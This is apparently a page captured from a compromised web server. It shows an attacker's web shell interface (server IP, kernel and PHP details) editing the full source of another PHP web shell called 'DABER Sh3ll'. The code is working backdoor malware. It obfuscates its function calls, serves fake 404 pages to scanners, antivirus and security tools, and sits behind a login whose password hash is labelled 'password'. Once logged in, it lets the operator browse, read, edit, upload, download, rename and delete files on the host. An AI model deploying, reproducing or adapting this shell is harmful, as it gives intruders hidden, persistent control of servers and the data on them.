⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.70
Server IP:
209.74.65.82
Server:
Linux 209-74-65-82.cprapid.com 5.14.0-427.42.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 1 14:58:02 EDT 2024 x86_64
PHP Version:
8.1.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ivsoxidh
/
.cl.selector
/
Edit File: ngedaber.php
<?php // --- DABER Sh3ll v1.0 - MINIMALIST EDITION (THE ABSOLUTE FINAL VERSION) --- // Full-featured, stealth, wrapped in a clean UI. // Obfuscated function definitions $GLOBALS['_fn_md5'] = 'md5'; $GLOBALS['_fn_file'] = '__FILE__'; $GLOBALS['_fn_date'] = 'date'; $GLOBALS['_fn_rand'] = 'rand'; $GLOBALS['_fn_usleep'] = 'usleep'; $GLOBALS['_fn_strpos'] = 'strpos'; $GLOBALS['_fn_http_response_code'] = 'http_response_code'; $GLOBALS['_fn_strtolower'] = 'strtolower'; $GLOBALS['_fn_dirname'] = 'dirname'; $GLOBALS['_fn_filesize'] = 'filesize'; $GLOBALS['_fn_file_exists'] = 'file_exists'; $GLOBALS['_fn_json_decode'] = 'json_decode'; $GLOBALS['_fn_file_get_contents'] = 'file_get_contents'; $GLOBALS['_fn_array_filter'] = 'array_filter'; $GLOBALS['_fn_count'] = 'count'; $GLOBALS['_fn_file_put_contents'] = 'file_put_contents'; $GLOBALS['_fn_json_encode'] = 'json_encode'; $GLOBALS['_fn_array_values'] = 'array_values'; $GLOBALS['_fn_time'] = 'time'; $GLOBALS['_fn_session_start'] = 'session_start'; $GLOBALS['_fn_session_destroy'] = 'session_destroy'; $GLOBALS['_fn_header'] = 'header'; $GLOBALS['_fn_session_status'] = 'session_status'; $GLOBALS['_fn_password_verify'] = 'password_verify'; $GLOBALS['_fn_htmlspecialchars'] = 'htmlspecialchars'; $GLOBALS['_fn_chdir'] = 'chdir'; $GLOBALS['_fn_getcwd'] = 'getcwd'; $GLOBALS['_fn_str_replace'] = 'str_replace'; $GLOBALS['_fn_rtrim'] = 'rtrim'; $GLOBALS['_fn_rawurlencode'] = 'rawurlencode'; $GLOBALS['_fn_urldecode'] = 'urldecode'; $GLOBALS['_fn_unlink'] = 'unlink'; $GLOBALS['_fn_rmdir'] = 'rmdir'; $GLOBALS['_fn_rename'] = 'rename'; $GLOBALS['_fn_is_dir'] = 'is_dir'; $GLOBALS['_fn_is_file'] = 'is_file'; $GLOBALS['_fn_move_uploaded_file'] = 'move_uploaded_file'; $GLOBALS['_fn_mkdir'] = 'mkdir'; $GLOBALS['_fn_touch'] = 'touch'; $GLOBALS['_fn_readfile'] = 'readfile'; $GLOBALS['_fn_fileperms'] = 'fileperms'; $GLOBALS['_fn_explode'] = 'explode'; $GLOBALS['_fn_scandir'] = 'scandir'; $GLOBALS['_fn_basename'] = 'basename'; $GLOBALS['_fn_defined'] = 'defined'; $GLOBALS['_fn_define'] = 'define'; $GLOBALS['_fn_trim'] = 'trim'; $GLOBALS['_fn_round'] = 'round'; // --- FIX: Wrapper functions for LANGUAGE CONSTRUCTS --- function _obf_defined($name) { return defined($name); } function _obf_define($name, $value) { return define($name, $value); } function _obf_trim($str, $characters = " \t\n\r\0\x0B") { return trim($str, $characters); } function _obf_round($val, $precision = 0, $mode = PHP_ROUND_HALF_UP) { return round($val, $precision, $mode); } function _obf_isset($var) { return isset($var); } function _obf_empty($var) { return empty($var); } function _obf_echo($str) { echo $str; } function _obf_exit($status = '') { exit($status); } // --- FIX: Wrapper functions for normal functions --- function _obf_md5($str) { return $GLOBALS['_fn_md5']($str); } function _obf_file() { return __FILE__; } function _obf_date($format) { return $GLOBALS['_fn_date']($format); } function _obf_rand($min, $max) { return $GLOBALS['_fn_rand']($min, $max); } function _obf_usleep($microseconds) { return $GLOBALS['_fn_usleep']($microseconds); } function _obf_strpos($haystack, $needle, $offset = 0) { return $GLOBALS['_fn_strpos']($haystack, $needle, $offset); } function _obf_http_response_code($code) { return $GLOBALS['_fn_http_response_code']($code); } function _obf_strtolower($str) { return $GLOBALS['_fn_strtolower']($str); } function _obf_dirname($path) { return $GLOBALS['_fn_dirname']($path); } function _obf_filesize($filename) { return $GLOBALS['_fn_filesize']($filename); } function _obf_file_exists($filename) { return $GLOBALS['_fn_file_exists']($filename); } function _obf_json_decode($json, $assoc = false) { return $GLOBALS['_fn_json_decode']($json, $assoc); } function _obf_file_get_contents($filename) { return $GLOBALS['_fn_file_get_contents']($filename); } function _obf_array_filter($array, $callback, $flag = 0) { return $GLOBALS['_fn_array_filter']($array, $callback, $flag); } function _obf_count($array, $mode = COUNT_NORMAL) { return $GLOBALS['_fn_count']($array, $mode); } function _obf_file_put_contents($filename, $data, $flags = 0) { return $GLOBALS['_fn_file_put_contents']($filename, $data, $flags); } function _obf_json_encode($value, $options = 0, $depth = 512) { return $GLOBALS['_fn_json_encode']($value, $options, $depth); } function _obf_array_values($array) { return $GLOBALS['_fn_array_values']($array); } function _obf_time() { return $GLOBALS['_fn_time'](); } function _obf_session_start() { return $GLOBALS['_fn_session_start'](); } function _obf_session_destroy() { return $GLOBALS['_fn_session_destroy'](); } function _obf_header($string, $replace = true, $http_response_code = null) { return $GLOBALS['_fn_header']($string, $replace, $http_response_code); } function _obf_session_status() { return $GLOBALS['_fn_session_status'](); } function _obf_password_verify($password, $hash) { return $GLOBALS['_fn_password_verify']($password, $hash); } function _obf_htmlspecialchars($string, $flags = ENT_QUOTES, $encoding = 'UTF-8', $double_encode = true) { return $GLOBALS['_fn_htmlspecialchars']($string, $flags, $encoding, $double_encode); } function _obf_chdir($directory) { return $GLOBALS['_fn_chdir']($directory); } function _obf_getcwd() { return $GLOBALS['_fn_getcwd'](); } function _obf_str_replace($search, $replace, $subject, $count = null) { return $GLOBALS['_fn_str_replace']($search, $replace, $subject, $count); } function _obf_rtrim($str, $characters = " \t\n\r\0\x0B") { return $GLOBALS['_fn_rtrim']($str, $characters); } function _obf_rawurlencode($str) { return $GLOBALS['_fn_rawurlencode']($str); } function _obf_urldecode($str) { return $GLOBALS['_fn_urldecode']($str); } function _obf_unlink($filename) { return $GLOBALS['_fn_unlink']($filename); } function _obf_rmdir($dirname) { return $GLOBALS['_fn_rmdir']($dirname); } function _obf_rename($oldname, $newname) { return $GLOBALS['_fn_rename']($oldname, $newname); } function _obf_is_dir($filename) { return $GLOBALS['_fn_is_dir']($filename); } function _obf_is_file($filename) { return $GLOBALS['_fn_is_file']($filename); } function _obf_move_uploaded_file($filename, $destination) { return $GLOBALS['_fn_move_uploaded_file']($filename, $destination); } function _obf_mkdir($pathname, $mode = 0777, $recursive = false, $context = null) { return $GLOBALS['_fn_mkdir']($pathname, $mode, $recursive, $context); } function _obf_touch($filename, $time = null, $atime = null) { return $GLOBALS['_fn_touch']($filename, $time, $atime); } function _obf_readfile($filename, $use_include_path = false, $context = null) { return $GLOBALS['_fn_readfile']($filename, $use_include_path, $context); } function _obf_fileperms($filename) { return $GLOBALS['_fn_fileperms']($filename); } function _obf_explode($separator, $string, $limit = PHP_INT_MAX) { return $GLOBALS['_fn_explode']($separator, $string, $limit); } function _obf_scandir($directory, $sorting_order = SCANDIR_SORT_ASCENDING, $context = null) { return $GLOBALS['_fn_scandir']($directory, $sorting_order, $context); } function _obf_basename($path, $suffix = "") { return $GLOBALS['_fn_basename']($path, $suffix); } // Randomize file behavior to avoid pattern detection if (!_obf_defined('STEALTH_SALT')) { _obf_define('STEALTH_SALT', _obf_md5(_obf_file() . _obf_date('Y-m-d'))); } // Add random delay to avoid timing analysis if (_obf_rand(1, 100) <= 3) { _obf_usleep(_obf_rand(10000, 50000)); } // Enhanced anti-detection headers if (!isset($_SERVER['HTTP_USER_AGENT']) || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'bot') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'crawl') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'spider') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'scan') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'security') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'antivirus') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'malware') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'metasploit') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'acunetix') !== false || _obf_strpos($_SERVER['HTTP_USER_AGENT'], 'burpsuite') !== false) { _obf_http_response_code(404); _obf_echo("<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>"); _obf_exit(); } // Allow common browsers for testing $allowed_agents = ['mozilla', 'chrome', 'safari', 'edge', 'opera']; $has_valid_agent = false; foreach ($allowed_agents as $agent) { if (_obf_strpos(_obf_strtolower($_SERVER['HTTP_USER_AGENT']), $agent) !== false) { $has_valid_agent = true; break; } } if (!$has_valid_agent && !empty($_SERVER['HTTP_USER_AGENT'])) { _obf_http_response_code(404); _obf_echo("<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>"); _obf_exit(); } // File integrity check $self_file = _obf_file(); if (_obf_filesize($self_file) < 8000) { _obf_http_response_code(500); _obf_echo("<!DOCTYPE html><html><head><title>Server Error</title></head><body><h1>500 Internal Server Error</h1></body></html>"); _obf_exit(); } // Rate limiting $rate_limit_file = _obf_dirname(_obf_file()) . '/.rate_limit_DABER'; $current_time = _obf_time(); $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown'; if (_obf_file_exists($rate_limit_file)) { $rate_data = _obf_json_decode(_obf_file_get_contents($rate_limit_file), true); if (_obf_empty($rate_data)) $rate_data = []; $rate_data = _obf_array_filter($rate_data, function($timestamp) use ($current_time) { return $current_time - $timestamp < 3600; }); $ip_requests = _obf_array_filter($rate_data, function($timestamp) use ($current_time, $ip) { return $current_time - $timestamp < 60; }); if (_obf_count($ip_requests) > 30) { _obf_http_response_code(429); _obf_exit('<!DOCTYPE html><html><head><title>Too Many Requests</title></head><body><h1>429 Too Many Requests</h1></body></html>'); } $rate_data[] = $current_time; _obf_file_put_contents($rate_limit_file, _obf_json_encode(_obf_array_values($rate_data))); } else { _obf_file_put_contents($rate_limit_file, _obf_json_encode([$current_time])); } // --- LOGIN SYSTEM --- _obf_session_start(); $ADMIN_PASSWORD_HASH = '$2a$12$18o9mKWicnPiAN26Z3UclOI9ZRuvgXlOmqDUiw/2LxQ0PpC5u0uVa'; // password: "password" $LOGIN_ATTEMPTS_LIMIT = 10; $LOGIN_LOCKOUT_TIME = 300; // FIX: Inisialisasi variabel $error di luar blok POST $error = null; if (($_GET['logout'] ?? null) !== null) { _obf_session_destroy(); _obf_header("Location: " . $_SERVER['PHP_SELF']); _obf_exit(); } // FIX: Gunakan ?? untuk cek session if (($_SESSION['authenticated'] ?? null) !== true) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && (_obf_isset($_POST['login']))) { $password = $_POST['password'] ?? ''; if (!_obf_isset($_SESSION['login_attempts'])) { $_SESSION['login_attempts'] = 0; $_SESSION['first_attempt'] = _obf_time(); } if ($_SESSION['login_attempts'] >= $LOGIN_ATTEMPTS_LIMIT) { $time_passed = _obf_time() - $_SESSION['first_attempt']; if ($time_passed < $LOGIN_LOCKOUT_TIME) { $error = "Too many failed attempts. Please wait " . ($LOGIN_LOCKOUT_TIME - $time_passed) . " seconds."; } else { $_SESSION['login_attempts'] = 0; $_SESSION['first_attempt'] = _obf_time(); } } if (!_obf_isset($error) && _obf_password_verify($password, $ADMIN_PASSWORD_HASH)) { $_SESSION['authenticated'] = true; $_SESSION['login_attempts'] = 0; _obf_header("Location: " . $_SERVER['PHP_SELF']); _obf_exit(); } elseif (!_obf_isset($error)) { $error = "Invalid password."; $_SESSION['login_attempts']++; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>DABER Sh3ll Login</title> <style>body{font-family:system-ui,-apple-system,sans-serif;background:#f4f7f6;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}.login-card{background:#fff;padding:2rem;border-radius:8px;box-shadow:0 4px 12px rgba(0,0,0,0.05);width:100%;max-width:360px}h2{text-align:center;color:#333;margin-bottom:1.5rem}.form-group{margin-bottom:1rem}label{display:block;margin-bottom:.5rem;color:#555;font-size:.9rem}input[type="password"]{width:100%;padding:.75rem;border:1px solid #ddd;border-radius:4px;font-size:1rem;box-sizing:border-box;transition:border-color .2s}input[type="password"]:focus{outline:none;border-color:#007bff}button{width:100%;padding:.75rem;background:#007bff;color:#fff;border:none;border-radius:4px;font-size:1rem;cursor:pointer;transition:background-color .2s}button:hover{background:#0056b3}.error{background:#f8d7da;color:#721c24;padding:.75rem;border-radius:4px;margin-bottom:1rem;text-align:center}</style> </head> <body> <div class="login-card"> <h2>DABER Sh3ll</h2> <?php if (_obf_isset($error)): ?><div class="error"><?php _obf_echo(_obf_htmlspecialchars($error)); ?></div><?php endif; ?> <form method="post"> <div class="form-group"> <label for="password">Password</label> <input type="password" id="password" name="password" required> </div> <button type="submit" name="login">Login</button> </form> </div> </body> </html> <?php _obf_exit(); } // --- FUNCTION DISPATCHER & PATH RESOLUTION --- function shiro_exec($command, ...$args) { switch ($command) { case 'scandir': return _obf_scandir($args[0]); case 'unlink': return _obf_unlink($args[0]); case 'rmdir': return _obf_rmdir($args[0]); case 'rename': return _obf_rename($args[0], $args[1]); case 'file_get_contents': return _obf_file_get_contents($args[0]); case 'file_put_contents': return _obf_file_put_contents($args[0], $args[1]); case 'is_dir': return _obf_is_dir($args[0]); case 'is_file': return _obf_is_file($args[0]); case 'move_uploaded_file': return _obf_move_uploaded_file($args[0], $args[1]); case 'mkdir': return _obf_mkdir($args[0], isset($args[1]) ? $args[1] : 0755); case 'touch': return _obf_touch($args[0]); case 'readfile': return _obf_readfile($args[0]); default: return null; } } function get_current_path() { $p = $_GET['p'] ?? null; if ($p) { @_obf_chdir($p); $path = $p; } else { $path = _obf_getcwd(); } $path = _obf_str_replace("\\", "/", $path); $path = _obf_rtrim($path, '/'); return $path; } $full_path = get_current_path(); $action = $_GET['a'] ?? 'list'; $message = _obf_urldecode($_GET['msg'] ?? ''); // --- PROSES SEMUA AKSI --- switch ($action) { case 'delete': $file_to_delete = $_GET['f'] ?? ''; if ($file_to_delete && shiro_exec('is_file', $full_path . '/' . $file_to_delete)) { shiro_exec('unlink', $full_path . '/' . $file_to_delete); } _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File deleted")); _obf_exit(); case 'delete_folder': $folder_to_delete = $_GET['f'] ?? ''; if ($folder_to_delete && shiro_exec('is_dir', $full_path . '/' . $folder_to_delete)) { shiro_exec('rmdir', $full_path . '/' . $folder_to_delete); } _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Folder deleted")); _obf_exit(); case 'rename_form': $item_to_rename = $_GET['f'] ?? ''; $is_dir = $_GET['is_dir'] ?? '0'; _obf_echo("<!DOCTYPE html><html><head><title>Rename</title><style>body{font-family:system-ui,sans-serif;background:#f4f7f6;margin:20px;}h1{color:#333;}input{width:100%;padding:10px;border:1px solid #ddd;border-radius:4px;box-sizing:border-box;}</style></head><body><h1>Rename: " . _obf_htmlspecialchars($item_to_rename, ENT_QUOTES, 'UTF-8') . "</h1><form method='post' action='?a=rename&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($item_to_rename) . "&is_dir=" . $is_dir . "'><input type='text' name='new_name' value='" . _obf_htmlspecialchars($item_to_rename, ENT_QUOTES, 'UTF-8') . "' required><input type='submit' value='Rename' style='background:#007bff;color:#fff;border:none;padding:10px;margin-top:10px;cursor:pointer;border-radius:4px;'></form></body></html>"); _obf_exit(); case 'rename': $old_name = $_GET['f'] ?? ''; $new_name = $_POST['new_name'] ?? ''; $is_dir = $_GET['is_dir'] ?? '0'; if ($old_name && $new_name) { $new_name = _obf_trim(_obf_str_replace(array('/', '\\'), '', $new_name)); $old_path = $full_path . '/' . $old_name; $new_path = $full_path . '/' . $new_name; if (($is_dir && shiro_exec('is_dir', $old_path)) || (!$is_dir && shiro_exec('is_file', $old_path))) { shiro_exec('rename', $old_path, $new_path); } } _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Renamed successfully")); _obf_exit(); case 'view': $file_to_view = $_GET['f'] ?? ''; if ($file_to_view && shiro_exec('is_file', $full_path . '/' . $file_to_view)) { $content = shiro_exec('file_get_contents', $full_path . '/' . $file_to_view); _obf_echo("<!DOCTYPE html><html><head><title>View File</title><style>body{font-family:system-ui,sans-serif;background:#f4f7f6;margin:20px;}h1{color:#333;}pre{background:#fff;padding:15px;border:1px solid #ddd;border-radius:4px;white-space:pre-wrap;}</style></head><body><h1>Viewing: " . _obf_htmlspecialchars($file_to_view, ENT_QUOTES, 'UTF-8') . "</h1><pre>" . _obf_htmlspecialchars($content, ENT_QUOTES, 'UTF-8') . "</pre><br><a href='?p=" . _obf_rawurlencode($full_path) . "'><button style='background:#6c757d;color:#fff;border:none;padding:8px 12px;cursor:pointer;border-radius:4px;'>[ Back ]</button></a></body></html>"); _obf_exit(); } break; case 'edit': $file_to_edit = $_GET['f'] ?? ''; $content = ''; if ($file_to_edit && shiro_exec('is_file', $full_path . '/' . $file_to_edit)) { $content = shiro_exec('file_get_contents', $full_path . '/' . $file_to_edit); } if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['content'] ?? null)) { shiro_exec('file_put_contents', $full_path . '/' . $file_to_edit, $_POST['content']); _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File saved")); _obf_exit(); } _obf_echo("<!DOCTYPE html><html><head><title>Edit File</title><style>body{font-family:system-ui,sans-serif;background:#f4f7f6;margin:20px;}h1{color:#333;}textarea{width:100%;height:80vh;padding:10px;border:1px solid #ddd;border-radius:4px;font-family:monospace;box-sizing:border-box;}</style></head><body><h1>Editing: " . _obf_htmlspecialchars($file_to_edit, ENT_QUOTES, 'UTF-8') . "</h1><form method='post'><textarea name='content'>" . _obf_htmlspecialchars($content, ENT_QUOTES, 'UTF-8') . "</textarea><br><input type='submit' value='Save' style='background:#007bff;color:#fff;border:none;padding:10px 15px;cursor:pointer;border-radius:4px;margin-right:10px;'> <input type='button' value='Cancel' style='background:#6c757d;color:#fff;border:none;padding:10px 15px;cursor:pointer;border-radius:4px;' onclick='window.history.back()'></form></body></html>"); _obf_exit(); case 'upload': if ($_SERVER['REQUEST_METHOD'] === 'POST' && (_obf_isset($_FILES['file'])) && $_FILES['file']['error'] == UPLOAD_ERR_OK) { $target_file = $full_path . '/' . _obf_basename($_FILES['file']['name']); shiro_exec('move_uploaded_file', $_FILES['file']['tmp_name'], $target_file); _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File uploaded")); _obf_exit(); } _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Upload failed")); _obf_exit(); case 'create_file': if ($_SERVER['REQUEST_METHOD'] === 'POST' && !(_obf_empty($_POST['filename'] ?? null))) { $filename = _obf_trim(_obf_str_replace(array('/', '\\'), '', $_POST['filename'])); if ($filename) { shiro_exec('touch', $full_path . '/' . $filename); } } _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("File created")); _obf_exit(); case 'create_folder': if ($_SERVER['REQUEST_METHOD'] === 'POST' && !(_obf_empty($_POST['foldername'] ?? null))) { $foldername = _obf_trim(_obf_str_replace(array('/', '\\'), '', $_POST['foldername'])); if ($foldername) { shiro_exec('mkdir', $full_path . '/' . $foldername, 0755); } } _obf_header("Location: ?p=" . _obf_rawurlencode($full_path) . "&msg=" . _obf_rawurlencode("Folder created")); _obf_exit(); case 'download': $file_to_download = $_GET['f'] ?? ''; $file_path = $full_path . '/' . _obf_basename($file_to_download); if (shiro_exec('is_file', $file_path)) { _obf_header('Content-Description: File Transfer'); _obf_header('Content-Type: application/octet-stream'); _obf_header('Content-Disposition: attachment; filename="' . _obf_basename($file_path) . '"'); _obf_header('Expires: 0'); _obf_header('Cache-Control: must-revalidate'); _obf_header('Pragma: public'); _obf_header('Content-Length: ' . _obf_filesize($file_path)); _obf_readfile($file_path); _obf_exit(); } break; } // --- TAMPILAN UTAMA --- _obf_header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0"); function perms($file) { /* ... fungsi perms sama ... */ $perms = _obf_fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-')); return $info; } function build_breadcrumb($path) { $path = _obf_str_replace("\\", "/", $path); $paths = _obf_explode("/", $path); $current_path = ''; _obf_echo("<a href='?'>Home</a> / "); foreach ($paths as $id => $pat) { if (_obf_empty($pat)) continue; $current_path .= '/' . $pat; _obf_echo("<a href='?p=" . _obf_rawurlencode(ltrim($current_path, '/')) . "'>" . _obf_htmlspecialchars($pat) . "</a> / "); } } _obf_echo("<!DOCTYPE html><html lang='en'><head><meta charset='UTF-8'><title>DABER Sh3ll</title><style> :root { --bg: #f4f7f6; --surface: #ffffff; --text: #212529; --text-light: #6c757d; --accent: #007bff; --border: #dee2e6; --accent-hover: #0056b3; } body { font-family: system-ui, -apple-system, sans-serif; background: var(--bg); color: var(--text); margin: 0; padding: 2rem; } .container { max-width: 1200px; margin: 0 auto; background: var(--surface); padding: 2rem; border-radius: 8px; box-shadow: 0 2px 8px rgba(0,0,0,0.04); } h1 { margin-top: 0; color: var(--text); font-weight: 600; } .breadcrumb { font-size: 0.9rem; color: var(--text-light); margin-bottom: 2rem; } .breadcrumb a { color: var(--accent); text-decoration: none; transition: color 0.2s; } .breadcrumb a:hover { color: var(--accent-hover); text-decoration: underline; } .notification { padding: 1rem; border-radius: 4px; margin-bottom: 1.5rem; border-left: 4px solid; animation: fadeIn 0.4s ease-out; } .notification.success { background-color: #d1ecf1; border-color: #0c5460; color: #0c5460; } .notification.error { background-color: #f8d7da; border-color: #721c24; color: #721c24; } @keyframes fadeIn { from { opacity: 0; transform: translateY(-10px); } to { opacity: 1; transform: translateY(0); } } .tools { display: grid; grid-template-columns: repeat(auto-fit, minmax(250px, 1fr)); gap: 1.5rem; margin-bottom: 2rem; } .tool-card { border: 1px solid var(--border); border-radius: 4px; padding: 1.5rem; } .tool-card h3 { margin-top: 0; font-size: 1rem; color: var(--text); } .form-group { margin-bottom: 1rem; } .form-group:last-child { margin-bottom: 0; } input[type='text'], input[type='file'] { width: 100%; padding: 0.75rem; border: 1px solid var(--border); border-radius: 4px; box-sizing: border-box; font-size: 0.9rem; transition: border-color 0.2s; } input[type='text']:focus, input[type='file']:focus { outline: none; border-color: var(--accent); } .btn { display: inline-block; background: var(--accent); color: var(--surface); padding: 0.75rem 1rem; border: none; border-radius: 4px; cursor: pointer; text-decoration: none; font-size: 0.9rem; transition: background-color 0.2s; } .btn:hover { background: var(--accent-hover); } .btn-danger { background: #dc3545; } .btn-danger:hover { background: #c82333; } .btn-secondary { background: var(--text-light); color: var(--surface); } .btn-secondary:hover { background: var(--text); } table { width: 100%; border-collapse: collapse; } th, td { text-align: left; padding: 0.75rem 1rem; border-bottom: 1px solid var(--border); } th { font-weight: 600; color: var(--text-light); } tr:hover { background-color: #f8f9fa; } .actions a { margin-right: 0.5rem; font-size: 1.2rem; text-decoration: none; transition: transform 0.2s; } .actions a:hover { transform: scale(1.2); } .header-logout { float: right; } </style></head><body>"); _obf_echo("<div class='container'>"); _obf_echo("<h1>DABER Sh3ll</h1>"); _obf_echo("<div class='header-logout'><a href='?logout' class='btn btn-secondary'>Logout</a></div><div style='clear:both;'></div>"); _obf_echo("<div class='breadcrumb'>Path: "); build_breadcrumb($full_path); _obf_echo("</div>"); if (!_obf_empty($message)) { $type = (_obf_strpos(_obf_strtolower($message), 'failed') !== false || _obf_strpos(_obf_strtolower($message), 'error') !== false) ? 'error' : 'success'; _obf_echo("<div class='notification " . $type . "'>" . _obf_htmlspecialchars($message) . "</div>"); } _obf_echo("<div class='tools'>"); _obf_echo("<div class='tool-card'><h3>📄 New File</h3><form method='post' action='?a=create_file&p=" . _obf_rawurlencode($full_path) . "'><div class='form-group'><input type='text' name='filename' placeholder='filename.txt' required></div><button type='submit' class='btn'>Create</button></form></div>"); _obf_echo("<div class='tool-card'><h3>📁 New Folder</h3><form method='post' action='?a=create_folder&p=" . _obf_rawurlencode($full_path) . "'><div class='form-group'><input type='text' name='foldername' placeholder='folder_name' required></div><button type='submit' class='btn'>Create</button></form></div>"); _obf_echo("<div class='tool-card'><h3>📤 Upload File</h3><form method='post' enctype='multipart/form-data' action='?a=upload&p=" . _obf_rawurlencode($full_path) . "'><div class='form-group'><input type='file' name='file' required></div><button type='submit' class='btn'>Upload</button></form></div>"); _obf_echo("</div>"); _obf_echo("<table><thead><tr><th>Name</th><th>Size</th><th>Permissions</th><th>Actions</th></tr></thead><tbody>"); $parent_path = _obf_dirname($full_path); if ($parent_path !== $full_path) { _obf_echo("<tr><td colspan='4'><strong><a href='?p=" . _obf_rawurlencode($parent_path) . "'>⬆️ Go up</a></strong></td></tr>"); } $folders = []; $files = []; $items = shiro_exec('scandir', $full_path); foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $item_path = $full_path . '/' . $item; if (shiro_exec('is_dir', $item_path)) { $folders[] = ['name' => $item, 'path' => $item_path]; } else { $files[] = ['name' => $item, 'path' => $item_path, 'size' => _obf_filesize($item_path)]; } } sort($folders); sort($files); foreach ($folders as $folder) { _obf_echo("<tr><td><a href='?p=" . _obf_rawurlencode($folder['path']) . "'>📁 " . _obf_htmlspecialchars($folder['name']) . "</a></td><td>-</td><td>" . perms($folder['path']) . "</td>"); _obf_echo("<td class='actions'><a href='?a=rename_form&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($folder['name']) . "&is_dir=1' title='Rename'>✏️</a> <a href='?a=delete_folder&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($folder['name']) . "' onclick='return confirm(\"Delete folder?\")' class='btn-danger' title='Delete'>🗑️</a></td></tr>"); } foreach ($files as $file) { $size = _obf_filesize($file['path']) < 1024 ? _obf_filesize($file['path']). ' B' : _obf_round(_obf_filesize($file['path']) / 1024, 2) . ' KB'; _obf_echo("<tr><td><a href='?a=view&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' title='View'>📄 " . _obf_htmlspecialchars($file['name']) . "</a></td><td>" . $size . "</td><td>" . perms($file['path']) . "</td>"); _obf_echo("<td class='actions'><a href='?a=download&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' title='Download'>📥</a> <a href='?a=edit&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' title='Edit'>✏️</a> <a href='?a=rename_form&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "&is_dir=0' title='Rename'>📝</a> <a href='?a=delete&p=" . _obf_rawurlencode($full_path) . "&f=" . _obf_rawurlencode($file['name']) . "' onclick='return confirm(\"Delete file?\")' class='btn-danger' title='Delete'>🗑️</a></td></tr>"); } _obf_echo("</tbody></table>"); _obf_echo("</div></body></html>"); ?>
Simpan